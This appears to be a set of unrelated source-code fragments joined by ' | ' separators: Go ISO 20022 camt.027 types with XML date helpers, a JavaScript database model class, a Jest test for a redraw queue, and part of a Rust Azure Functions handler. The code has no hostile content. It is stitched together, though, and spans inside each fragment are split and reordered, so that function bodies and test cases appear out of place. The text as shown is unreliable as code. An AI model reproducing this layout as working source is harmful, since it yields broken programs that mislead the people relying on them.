Strd []StructuredRemittanceInformation17 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Strd,omitempty"`
}
// May be one of FRST, RCUR, FNAL, OOFF, RPRE
type SequenceType3Code string
type ServiceLevel8Choice struct {
Cd ExternalServiceLevel1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type SettlementInstruction11 struct {
SttlmMtd SettlementMethod1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SttlmMtd"`
SttlmAcct CashAccount40 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SttlmAcct,omitempty"`
ClrSys ClearingSystemIdentification3Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ClrSys,omitempty"`
InstgRmbrsmntAgt BranchAndFinancialInstitutionIdentification6 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 InstgRmbrsmntAgt,omitempty"`
InstgRmbrsmntAgtAcct CashAccount40 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 InstgRmbrsmntAgtAcct,omitempty"`
InstdRmbrsmntAgt BranchAndFinancialInstitutionIdentification6 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 InstdRmbrsmntAgt,omitempty"`
InstdRmbrsmntAgtAcct CashAccount40 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 InstdRmbrsmntAgtAcct,omitempty"`
ThrdRmbrsmntAgt BranchAndFinancialInstitutionIdentification6 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ThrdRmbrsmntAgt,omitempty"`
ThrdRmbrsmntAgtAcct CashAccount40 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ThrdRmbrsmntAgtAcct,omitempty"`
}
type SettlementInstruction13 struct {
InstgRmbrsmntAgt BranchAndFinancialInstitutionIdentification6 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 InstgRmbrsmntAgt,omitempty"`
InstgRmbrsmntAgtAcct CashAccount40 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 InstgRmbrsmntAgtAcct,omitempty"`
InstdRmbrsmntAgt BranchAndFinancialInstitutionIdentification6 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 InstdRmbrsmntAgt,omitempty"`
InstdRmbrsmntAgtAcct CashAccount40 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 InstdRmbrsmntAgtAcct,omitempty"`
}
// May be one of INDA, INGA, COVE, CLRG
type SettlementMethod1Code string
type StructuredRemittanceInformation17 struct {
RfrdDocInf []ReferredDocumentInformation7 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 RfrdDocInf,omitempty"`
RfrdDocAmt RemittanceAmount2 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 RfrdDocAmt,omitempty"`
CdtrRefInf CreditorReferenceInformation2 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CdtrRefInf,omitempty"`
Invcr PartyIdentification135 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Invcr,omitempty"`
Invcee PartyIdentification135 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Invcee,omitempty"`
TaxRmt TaxData1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TaxRmt,omitempty"`
GrnshmtRmt Garnishment3 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 GrnshmtRmt,omitempty"`
AddtlRmtInf []Max140Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 AddtlRmtInf,omitempty"`
}
type SupplementaryData1 struct {
PlcAndNm Max350Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 PlcAndNm,omitempty"`
Envlp SupplementaryDataEnvelope1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Envlp"`
}
type SupplementaryDataEnvelope1 struct {
Item string `xml:",any"`
}
type TaxAmount3 struct {
Rate float64 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Rate,omitempty"`
TaxblBaseAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TaxblBaseAmt,omitempty"`
TtlAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TtlAmt,omitempty"`
Dtls []TaxRecordDetails3 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Dtls,omitempty"`
}
type TaxAmountAndType1 struct {
Tp TaxAmountType1Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp,omitempty"`
Amt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Amt"`
}
type TaxAmountType1Choice struct {
Cd ExternalTaxAmountType1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cd,omitempty"`
Prtry Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prtry,omitempty"`
}
type TaxAuthorisation1 struct {
Titl Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Titl,omitempty"`
Nm Max140Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Nm,omitempty"`
}
type TaxData1 struct {
Cdtr TaxParty1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Cdtr,omitempty"`
Dbtr TaxParty2 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Dbtr,omitempty"`
UltmtDbtr TaxParty2 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 UltmtDbtr,omitempty"`
AdmstnZone Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 AdmstnZone,omitempty"`
RefNb Max140Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 RefNb,omitempty"`
Mtd Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Mtd,omitempty"`
TtlTaxblBaseAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TtlTaxblBaseAmt,omitempty"`
TtlTaxAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TtlTaxAmt,omitempty"`
Dt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Dt,omitempty"`
SeqNb float64 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 SeqNb,omitempty"`
Rcrd []TaxRecord3 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Rcrd,omitempty"`
}
type TaxParty1 struct {
TaxId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TaxId,omitempty"`
RegnId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 RegnId,omitempty"`
TaxTp Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TaxTp,omitempty"`
}
type TaxParty2 struct {
TaxId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TaxId,omitempty"`
RegnId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 RegnId,omitempty"`
TaxTp Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TaxTp,omitempty"`
Authstn TaxAuthorisation1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Authstn,omitempty"`
}
type TaxPeriod3 struct {
Yr ISOYear `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Yr,omitempty"`
Tp TaxRecordPeriod1Code `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp,omitempty"`
FrToDt DatePeriod2 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 FrToDt,omitempty"`
}
type TaxRecord3 struct {
Tp Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Tp,omitempty"`
Ctgy Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Ctgy,omitempty"`
CtgyDtls Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CtgyDtls,omitempty"`
DbtrSts Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 DbtrSts,omitempty"`
CertId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 CertId,omitempty"`
FrmsCd Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 FrmsCd,omitempty"`
Prd TaxPeriod3 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prd,omitempty"`
TaxAmt TaxAmount3 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 TaxAmt,omitempty"`
AddtlInf Max140Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 AddtlInf,omitempty"`
}
type TaxRecordDetails3 struct {
Prd TaxPeriod3 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Prd,omitempty"`
Amt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Amt"`
}
// May be one of MM01, MM02, MM03, MM04, MM05, MM06, MM07, MM08, MM09, MM10, MM11, MM12, QTR1, QTR2, QTR3, QTR4, HLF1, HLF2
type TaxRecordPeriod1Code string
// Must match the pattern [a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89ab][a-f0-9]{3}-[a-f0-9]{12}
type UUIDv4Identifier string
type UnderlyingGroupInformation1 struct {
OrgnlMsgId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlMsgId"`
OrgnlMsgNmId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlMsgNmId"`
OrgnlCreDtTm ISODateTime `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlCreDtTm,omitempty"`
OrgnlMsgDlvryChanl Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlMsgDlvryChanl,omitempty"`
}
type UnderlyingPaymentInstruction7 struct {
OrgnlGrpInf UnderlyingGroupInformation1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlGrpInf,omitempty"`
OrgnlPmtInfId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlPmtInfId,omitempty"`
OrgnlInstrId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlInstrId,omitempty"`
OrgnlEndToEndId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlEndToEndId,omitempty"`
OrgnlUETR UUIDv4Identifier `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlUETR,omitempty"`
OrgnlInstdAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlInstdAmt"`
ReqdExctnDt DateAndDateTime2Choice `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ReqdExctnDt,omitempty"`
ReqdColltnDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 ReqdColltnDt,omitempty"`
OrgnlTxRef OriginalTransactionReference35 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlTxRef,omitempty"`
}
type UnderlyingPaymentTransaction6 struct {
OrgnlGrpInf UnderlyingGroupInformation1 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlGrpInf,omitempty"`
OrgnlInstrId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlInstrId,omitempty"`
OrgnlEndToEndId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlEndToEndId,omitempty"`
OrgnlTxId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlTxId,omitempty"`
OrgnlUETR UUIDv4Identifier `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlUETR,omitempty"`
OrgnlIntrBkSttlmAmt ActiveOrHistoricCurrencyAndAmount `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlIntrBkSttlmAmt"`
OrgnlIntrBkSttlmDt ISODate `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlIntrBkSttlmDt"`
OrgnlTxRef OriginalTransactionReference35 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlTxRef,omitempty"`
}
type UnderlyingStatementEntry3 struct {
OrgnlGrpInf OriginalGroupInformation29 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlGrpInf,omitempty"`
OrgnlStmtId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlStmtId,omitempty"`
OrgnlNtryId Max35Text `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlNtryId,omitempty"`
OrgnlUETR UUIDv4Identifier `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 OrgnlUETR,omitempty"`
}
type UnderlyingTransaction7Choice struct {
Initn UnderlyingPaymentInstruction7 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 Initn,omitempty"`
IntrBk UnderlyingPaymentTransaction6 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 IntrBk,omitempty"`
StmtNtry UnderlyingStatementEntry3 `xml:"urn:iso:std:iso:20022:tech:xsd:camt.027.001.09 StmtNtry,omitempty"`
}
type xsdBase64Binary []byte
func (b *xsdBase64Binary) UnmarshalText(text []byte) (err error) {
*b, err = base64.StdEncoding.DecodeString(string(text))
return
}
func (b xsdBase64Binary) MarshalText() ([]byte, error) { | enc.Close()
return buf.Bytes(), nil
}
type xsdDate time.Time
func (t *xsdDate) UnmarshalText(text []byte) error {
return _unmarshalTime(text, (*time.Time)(t), "2006-01-02")
}
func (t xsdDate) MarshalText() ([]byte, error) {
return _marshalTime((time.Time)(t), "2006-01-02")
}
func (t xsdDate) MarshalXML(e *xml.Encoder, start xml.StartElement) error {
if (time.Time)(t).IsZero() {
return nil
}
m, err := t.MarshalText()
if err != nil {
return err
}
return e.EncodeElement(m, start)
}
func (t xsdDate) MarshalXMLAttr(name xml.Name) (xml.Attr, error) {
if (time.Time)(t).IsZero() {
return xml.Attr{}, nil
}
m, err := t.MarshalText()
return xml.Attr{Name: name, Value: string(m)}, err
}
func _unmarshalTime(text []byte, t *time.Time, format string) (err error) {
s := string(bytes.TrimSpace(text))
*t, err = time.Parse(format, s)
if _, ok := err.(*time.ParseError); ok {
*t, err = time.Parse(format+"Z07:00", s)
}
return err
}
func _marshalTime(t time.Time, format string) ([]byte, error) {
return []byte(t.Format(format + "Z07:00")), nil
}
type xsdDateTime time.Time
func (t *xsdDateTime) UnmarshalText(text []byte) error {
return _unmarshalTime(text, (*time.Time)(t), "2006-01-02T15:04:05.999999999")
}
func (t xsdDateTime) MarshalText() ([]byte, error) {
return _marshalTime((time.Time)(t), "2006-01-02T15:04:05.999999999")
}
func (t xsdDateTime) MarshalXML(e *xml.Encoder, start xml.StartElement) error {
if (time.Time)(t).IsZero() {
return nil
}
m, err := t.MarshalText()
if err != nil {
return err
}
return e.EncodeElement(m, start)
}
func (t xsdDateTime) MarshalXMLAttr(name xml.Name) (xml.Attr, error) {
if (time.Time)(t).IsZero() {
return xml.Attr{}, nil
}
m, err := t.MarshalText()
return xml.Attr{Name: name, Value: string(m)}, err
}
type xsdGYear time.Time
func (t *xsdGYear) UnmarshalText(text []byte) error {
return _unmarshalTime(text, (*time.Time)(t), "2006")
}
func (t xsdGYear) MarshalText() ([]byte, error) {
return _marshalTime((time.Time)(t), "2006")
}
func (t xsdGYear) MarshalXML(e *xml.Encoder, start xml.StartElement) error {
if (time.Time)(t).IsZero() {
return nil
}
m, err := t.MarshalText()
if err != nil {
return err
}
return e.EncodeElement(m, start)
}
func (t xsdGYear) MarshalXMLAttr(name xml.Name) (xml.Attr, error) {
if (time.Time)(t).IsZero() {
return xml.Attr{}, nil
}
m, err := t.MarshalText()
return xml.Attr{Name: name, Value: string(m)}, err
} | var buf bytes.Buffer
enc := base64.NewEncoder(base64.StdEncoding, &buf)
enc.Write([]byte(b)) |
database.class.js | import find from 'lodash/find';
import Base from './base.class';
import {
SSL_MODE_REQUIRED,
SSL_MODE_NA,
SSL_MODE_SSL_TLS,
} from './databases.constants';
import { ENGINES_NAMES } from './engines.constants';
export default class Database extends Base {
constructor({
createdAt,
plan,
id,
status,
nodeNumber,
description,
maintenanceWindow,
version,
domain,
networkType,
networkId,
subnetId,
engine,
nodes,
flavor,
sslMode,
host,
port,
uri,
}) {
super();
this.updateData({
createdAt,
plan,
id,
status,
nodeNumber,
description,
maintenanceWindow,
version,
domain,
networkType,
networkId,
subnetId,
engine,
nodes,
flavor,
sslMode,
host,
port,
uri,
});
}
setStatus(status) {
this.status = status;
}
get region() {
return this.nodes[0]?.region;
}
getEngineLabel() {
return ENGINES_NAMES[this.engine];
}
addNode(node) {
return this.nodes.push(node);
}
getNode(nodeId) {
return find(this.nodes, { id: nodeId });
}
setNodeStatus(node, status) {
const nodeObj = this.getNode(node.id);
nodeObj.status = status;
}
deleteNode(nodeId) {
this.nodes = this.nodes.filter((n) => n.id !== nodeId);
}
setNodes(nodes) {
nodes.forEach((node) => {
const nodeObj = this.getNode(node.id);
return nodeObj ? nodeObj.updateData(node) : this.addNode(node);
});
}
getEngineFromList(engines) {
if (!this.currentEngine) {
this.currentEngine = engines.find(
(engine) => engine.name === this.engine,
);
}
return this.currentEngine;
}
getSSLModeKey() {
if (!this.sslModeKey) {
this.sslModeKey = this.sslMode;
if (SSL_MODE_REQUIRED.includes(this.sslMode)) {
this.sslModeKey = 'required';
}
if (SSL_MODE_NA.includes(this.sslMode)) { | this.sslModeKey = 'n/a';
}
if (SSL_MODE_SSL_TLS.includes(this.sslMode)) {
this.sslModeKey = 'SSL_TLS';
}
}
return this.sslModeKey;
}
updateData(data) {
Object.assign(this, data);
}
} | |
documentSpec.js | import requestRedraw from '../src/requestRedraw';
describe('document', () => {
beforeEach(() => {
global.requestAnimationFrame = () => {};
});
afterEach(() => {
delete global.requestAnimationFrame;
// Jest triggers test environment setup/teardown per test suite,
// not per test, so we reset '__d3fc-elements__' after each test here.
delete document['__d3fc-elements__'];
});
it('should enqueue a single element', () => {
document.body.innerHTML = '<div></div>';
const element = document.querySelector('div'); | it('should not enqueue a duplicate element', () => {
document.body.innerHTML = '<div></div>';
const element = document.querySelector('div');
requestRedraw(element);
requestRedraw(element);
expect(document['__d3fc-elements__'].queue).toEqual([element]);
});
it('should enqueue an ancestor and drop the original element', () => {
document.body.innerHTML = '<div><a></a></div>';
let element = document.querySelector('a');
requestRedraw(element);
expect(document['__d3fc-elements__'].queue).toEqual([element]);
element = document.querySelector('div');
requestRedraw(element);
expect(document['__d3fc-elements__'].queue).toEqual([element]);
});
it('should not enqueue element if an ancestor is enqueued', () => {
document.body.innerHTML = '<div><a></a></div>';
let element = document.querySelector('div');
requestRedraw(element);
expect(document['__d3fc-elements__'].queue).toEqual([element]);
requestRedraw(document.querySelector('a'));
expect(document['__d3fc-elements__'].queue).toEqual([element]);
});
}); | requestRedraw(element);
expect(document['__d3fc-elements__'].queue).toEqual([element]);
});
|
lib.rs | #![deny(rust_2018_idioms, warnings)]
#![deny(clippy::all, clippy::pedantic)]
#![allow(
clippy::default_trait_access,
clippy::let_underscore_drop,
clippy::let_unit_value,
clippy::missing_errors_doc,
clippy::shadow_unrelated,
clippy::similar_names,
clippy::too_many_lines,
clippy::type_complexity,
)]
use anyhow::Context;
#[macro_export]
macro_rules! run {
($($name:literal => $f:expr ,)*) => {
fn main() -> $crate::_reexports::anyhow::Result<()> {
use $crate::_reexports::anyhow::Context;
let runtime =
$crate::_reexports::tokio::runtime::Builder::new_current_thread()
.enable_io()
.enable_time()
.build()?;
let local_set = $crate::_reexports::tokio::task::LocalSet::new();
let () = local_set.block_on(&runtime, async {
let (
misc_logger,
settings,
incoming,
) = $crate::_init().await?;
$crate::_reexports::futures_util::pin_mut!(incoming);
let (
azure_subscription_id,
azure_auth,
azure_log_analytics_workspace_resource_group_name,
azure_log_analytics_workspace_name,
settings,
) = $crate::_parse_settings(&settings)?;
let log_sender =
$crate::_log_sender(
&azure_subscription_id,
&azure_log_analytics_workspace_resource_group_name,
&azure_log_analytics_workspace_name,
&azure_auth,
&misc_logger,
).await?;
let mut pending_requests = $crate::_reexports::futures_util::stream::FuturesUnordered::new();
while let Some(stream) = $crate::_next_stream(&mut incoming, &mut pending_requests, &misc_logger).await {
pending_requests.push(async {
let mut stream = stream;
let (mut read, mut write) = stream.split();
let mut buf = [std::mem::MaybeUninit::uninit(); 8192];
let mut buf = $crate::_reexports::tokio::io::ReadBuf::uninit(&mut buf);
let (method, path, logger) = loop {
if let Some(req) = $crate::_parse_request(&mut read, &mut buf).await? {
break req;
}
};
$crate::_handle_request(method, path, &logger, &log_sender, &mut write, async {
Ok(match path {
$(
$name => Some($f(&azure_subscription_id, &azure_auth, &settings, &logger).await?),
)*
_ => None,
})
}).await?;
Ok(())
});
}
Ok::<_, $crate::_reexports::anyhow::Error>(())
})?;
Ok(())
}
};
}
#[doc(hidden)]
pub mod _reexports {
pub use anyhow;
pub use futures_util;
pub use tokio;
}
#[doc(hidden)]
pub async fn _init() -> anyhow::Result<(log2::Logger, String, impl futures_util::stream::Stream<Item = anyhow::Result<tokio::net::TcpStream>>)> {
{
struct GlobalLogger;
impl log::Log for GlobalLogger {
fn enabled(&self, metadata: &log::Metadata<'_>) -> bool {
metadata.level() <= log::Level::Info
}
fn log(&self, record: &log::Record<'_>) |
fn flush(&self) {
}
}
let logger = GlobalLogger;
log::set_logger(Box::leak(Box::new(logger))).expect("could not set global logger");
log::set_max_level(log::LevelFilter::Info);
}
let misc_logger = log2::Logger::new(None, false);
let settings = std::env::var("SECRET_SETTINGS").context("could not read SECRET_SETTINGS env var")?;
let port = match std::env::var("FUNCTIONS_CUSTOMHANDLER_PORT") {
Ok(value) => value.parse().with_context(|| format!("could not parse FUNCTIONS_CUSTOMHANDLER_PORT value {:?}", value))?,
Err(std::env::VarError::NotPresent) => 8080,
Err(std::env::VarError::NotUnicode(value)) =>
return Err(anyhow::anyhow!("could not parse FUNCTIONS_CUSTOMHANDLER_PORT value {:?}", value)),
};
let listener = tokio::net::TcpListener::bind((std::net::Ipv4Addr::new(127, 0, 0, 1), port)).await?;
let incoming = futures_util::stream::try_unfold(listener, |listener| async {
let (stream, _) = listener.accept().await.context("could not accept connection")?;
Ok(Some((stream, listener)))
});
Ok((
misc_logger,
settings,
incoming,
))
}
#[doc(hidden)]
pub fn _parse_settings<'a, TSettings>(settings: &'a str) -> anyhow::Result<(
std::borrow::Cow<'a, str>,
azure::Auth,
std::borrow::Cow<'a, str>,
std::borrow::Cow<'a, str>,
TSettings,
)> where TSettings: serde::Deserialize<'a> {
#[derive(serde::Deserialize)]
struct LoggerSettings<'a, TSettings> {
/// The Azure subscription ID.
#[serde(borrow)]
azure_subscription_id: std::borrow::Cow<'a, str>,
/// The Azure authentication credentials.
///
/// Defaults to parsing `azure::Auth::ManagedIdentity` from the environment.
/// If not found, then debug builds fall back to parsing a service principal from this JSON object's
/// `{ azure_client_id: String, azure_client_secret: String, azure_tenant_id: String }` properties.
#[serde(flatten)]
azure_auth: azure::Auth,
/// The name of the Azure resource group that contains the Azure Log Analytics workspace.
#[serde(borrow)]
azure_log_analytics_workspace_resource_group_name: std::borrow::Cow<'a, str>,
/// The name of the Azure Log Analytics workspace.
#[serde(borrow)]
azure_log_analytics_workspace_name: std::borrow::Cow<'a, str>,
#[serde(flatten)]
rest: TSettings,
}
let LoggerSettings {
azure_subscription_id,
azure_auth,
azure_log_analytics_workspace_resource_group_name,
azure_log_analytics_workspace_name,
rest: settings,
} = serde_json::from_str(settings).context("could not read SECRET_SETTINGS env var")?;
Ok((
azure_subscription_id,
azure_auth,
azure_log_analytics_workspace_resource_group_name,
azure_log_analytics_workspace_name,
settings,
))
}
#[doc(hidden)]
pub async fn _log_sender<'a>(
azure_subscription_id: &'a str,
azure_log_analytics_workspace_resource_group_name: &'a str,
azure_log_analytics_workspace_name: &'a str,
azure_auth: &'a azure::Auth,
misc_logger: &'a log2::Logger,
) -> anyhow::Result<azure::management::log_analytics::LogSender<'a>> {
let log_sender =
azure::management::Client::new(
azure_subscription_id,
azure_log_analytics_workspace_resource_group_name,
azure_auth,
concat!("github.com/Arnavion/acme-azure-function ", env!("CARGO_PKG_NAME"), "/", env!("CARGO_PKG_VERSION"))
.parse().expect("hard-coded user agent is valid HeaderValue"),
misc_logger,
).context("could not initialize Azure Management API client")?
.log_analytics_log_sender(azure_log_analytics_workspace_name)
.await.context("could not create LogAnalytics log sender")?;
Ok(log_sender)
}
#[doc(hidden)]
pub async fn _next_stream(
incoming: &mut (impl futures_util::stream::Stream<Item = anyhow::Result<tokio::net::TcpStream>> + Unpin),
pending_requests: &mut (impl futures_util::stream::Stream<Item = anyhow::Result<()>> + Unpin),
misc_logger: &log2::Logger,
) -> Option<tokio::net::TcpStream> {
// FuturesUnordered repeatedly yields Poll::Ready(None) when it's empty, but we want to treat it like it yields Poll::Pending.
// So chain(stream::pending()) to it.
let mut pending_requests = futures_util::StreamExt::chain(pending_requests, futures_util::stream::pending());
loop {
let next = futures_util::future::try_select(futures_util::TryStreamExt::try_next(incoming), futures_util::TryStreamExt::try_next(&mut pending_requests));
match next.await {
Ok(futures_util::future::Either::Left((stream, _))) => break stream,
Ok(futures_util::future::Either::Right(_)) => (),
Err(err) => {
let (err, _) = err.factor_first();
misc_logger.report_error(&err);
},
}
}
}
#[allow(clippy::needless_lifetimes)] // TODO: https://github.com/rust-lang/rust-clippy/issues/5787
#[doc(hidden)]
pub async fn _parse_request<'a>(
stream: &mut (impl tokio::io::AsyncRead + Unpin),
mut buf: &'a mut tokio::io::ReadBuf<'_>,
) -> anyhow::Result<Option<(&'a str, &'a str, log2::Logger)>> {
if buf.remaining() == 0 {
return Err(anyhow::anyhow!("request headers too large"));
}
{
let previous_filled = buf.filled().len();
let () =
futures_util::future::poll_fn(|cx| tokio::io::AsyncRead::poll_read(std::pin::Pin::new(stream), cx, &mut buf))
.await.context("could not read request")?;
let new_filled = buf.filled().len();
if previous_filled == new_filled {
return Err(anyhow::anyhow!("malformed request: EOF"));
}
}
// TODO: Replace with `std::mem::MaybeUninit::uninit_array::<16>()` when that is stabilized.
let mut headers = unsafe { std::mem::MaybeUninit::<[std::mem::MaybeUninit<httparse::Header<'_>>; 16]>::uninit().assume_init() };
let mut req = httparse::Request::new(&mut []);
let body_start = match req.parse_with_uninit_headers(buf.filled(), &mut headers).context("malformed request")? {
httparse::Status::Complete(body_start) => body_start,
httparse::Status::Partial => return Ok(None),
};
let method = req.method.context("malformed request: no method")?;
let path =
req.path
.and_then(|path| path.strip_prefix('/'))
.context("malformed request: no path")?;
if req.version != Some(1) {
return Err(anyhow::anyhow!("malformed request: not HTTP/1.1"));
}
let mut function_invocation_id = None;
for &httparse::Header { name, value } in &*req.headers {
const X_AZURE_FUNCTIONS_INVOCATIONID: &str = "x-azure-functions-invocationid";
if name.eq_ignore_ascii_case("content-length") {
// We're able to send a response and close the connection without reading the request body,
// but FunctionHost doesn't like it and fails the function invocation because it wasn't able to write the request body
// in its entirety. So we need to drain the request body.
let content_length: usize =
std::str::from_utf8(value).context("malformed request: malformed content-length header")?
.parse().context("malformed request: malformed content-length header")?;
let mut remaining = content_length - (buf.filled().len() - body_start);
let mut buf = [std::mem::MaybeUninit::uninit(); 8192];
let mut buf = tokio::io::ReadBuf::uninit(&mut buf);
while remaining > 0 {
buf.clear();
let () =
futures_util::future::poll_fn(|cx| tokio::io::AsyncRead::poll_read(std::pin::Pin::new(stream), cx, &mut buf))
.await.context("could not read request body")?;
let read = buf.filled().len();
if read == 0 {
return Err(anyhow::anyhow!("malformed request: EOF"));
}
remaining = remaining.checked_sub(read).unwrap_or_default();
}
}
else if name.eq_ignore_ascii_case(X_AZURE_FUNCTIONS_INVOCATIONID) {
function_invocation_id = std::str::from_utf8(value).ok().map(ToOwned::to_owned);
}
}
let logger = log2::Logger::new(function_invocation_id, true);
Ok(Some((
method,
path,
logger,
)))
}
#[doc(hidden)]
pub async fn _handle_request(
method: &str,
path: &str,
logger: &log2::Logger,
log_sender: &azure::management::log_analytics::LogSender<'_>,
stream: &mut (impl tokio::io::AsyncWrite + Unpin),
res_f: impl std::future::Future<Output = anyhow::Result<Option<std::borrow::Cow<'static, str>>>>,
) -> anyhow::Result<()> {
fn make_log_sender<'a>(
logger: &'a log2::Logger,
log_sender: &'a azure::management::log_analytics::LogSender<'_>,
) -> (
tokio::sync::oneshot::Sender<()>,
impl std::future::Future<Output = anyhow::Result<()>> + 'a,
) {
let (stop_log_sender_tx, mut stop_log_sender_rx) = tokio::sync::oneshot::channel();
let log_sender_f = async move {
let mut push_timer = tokio::time::interval(std::time::Duration::from_secs(1));
push_timer.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
loop {
let push_timer_tick = push_timer.tick();
futures_util::pin_mut!(push_timer_tick);
